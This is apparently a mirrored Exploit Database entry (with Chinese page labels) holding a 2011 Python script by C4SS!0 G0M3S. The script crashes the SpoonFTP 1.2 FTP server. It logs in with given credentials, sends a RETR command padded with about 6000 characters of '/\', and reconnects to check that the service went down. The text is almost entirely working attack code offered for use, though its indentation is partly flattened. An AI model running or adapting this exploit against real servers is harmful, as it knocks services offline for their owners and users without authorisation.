SpoonFTP 1.2 – RETR Denial of Service

• Exploit Database
• 14 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-03-21
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17021/

• #!/usr/bin/python
  #
  #
  #[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2
  #[+]Date: 21\03\2011
  #[+]Author: C4SS!0 G0M3S
  #[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
  #[+]Version: 1.2
  #[+]Tested On: WIN-XP SP3 Portuguese Brazil
  #[+]CVE: N/A
  #
  #
  # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
  # xxx xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
  #xxxxxxxx xxxxxx xxxxxx xxx xxxxxx
  # xxx xxx xxxxxx xxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx
  # xxxxxxxxx xxxxxx xxxxxx xxxxxxxxxxxxx
  #xxxxxx xxx xxxxxx xxxxxx xxxxxxxxx xxxx xxxxxxx
  #xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx xx xx xx
  # xxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxx xxxxxxxxxxxxx
  #
  #Criado por C4SS!0 G0M3S
  #E-mail Louredo_@hotmail.com
  #Site www.exploit-br.org
  #
  #
  
  
  
  from socket import *
  import os
  import sys
  from time import sleep
  
  if os.name == 'nt':
   os.system("cls")
   os.system("color 4f")
  else:
   os.system("clear")
  
  	 
  def usage():
   print """
  	 
  ===================================================
  ===================================================
  ==========Exploit Denial of Service SpoonFTP=======
  ==========Autor C4SS!0 G0M3S=======================
  ==========E-mail Louredo_@hotmail.com==============
  ==========Site www.exploit-br.org==================
  ===================================================
  ===================================================
  
  """
  
  if len(sys.argv) !=5:
   usage()
   print "\t\t[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]
   print "\t\t[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]
   sys.exit(0)
  
  host = sys.argv[1]
  porta = int(sys.argv[2])
  user = sys.argv[3]
  pasw = sys.argv[4]
  
  exploit = "/\\" * (6000/3)
  usage()
  print "\t\t[+]Connecting to Server "+host+"...\n"
  sleep(1)
  s = socket(AF_INET,SOCK_STREAM)
  try:
   s.connect((host,porta))
   print "\t\t[+]Checking if server is vulnerable\n"
   sleep(1)
   banner = s.recv(2000)
   if banner.find("SpoonFTP V1.2") == -1:
  print "\t\t[+]I'm sorry, server is not vulnerable:(\n"
  sleep(1)
  sys.exit(0x00)
   print "\t\t[+]Making Loging On Server\n"
   sleep(1)
   s.send("USER "+user+"\r\n")
   s.recv(200)
   s.send("PASS "+pasw+"\r\n")
   check = s.recv(2000)
   if check.find("230") == -1:
  print "\t\t[+]Error on Login, Check Your Username or Password\n"
  sleep(1)
  sys.exit(0)
   print "\t\t[+]Sending Exploit...\n"
   sleep(1)
   s.send("RETR "+exploit+"\r\n")
   s.close()
   print "\t\t[+]Submitted Exploit Success\n"
   sleep(1)
  
   print "\t\t[+]Checking if the exploit works\n"
   sleep(1)
   try:
  so = socket(AF_INET,SOCK_STREAM)
  s.connect((host,porta))
  print "\t\t[+]I'm Sorry, But Not Worked Exploit:(\n"
  	sleep(1)
   except:
  print "\t\t[+]Congratulations, worked with the Exploit Success:)\n"
  	sleep(1)
   
   
  except:
   print "\t\t[+]Error connecting to Server\n"
   sleep(1)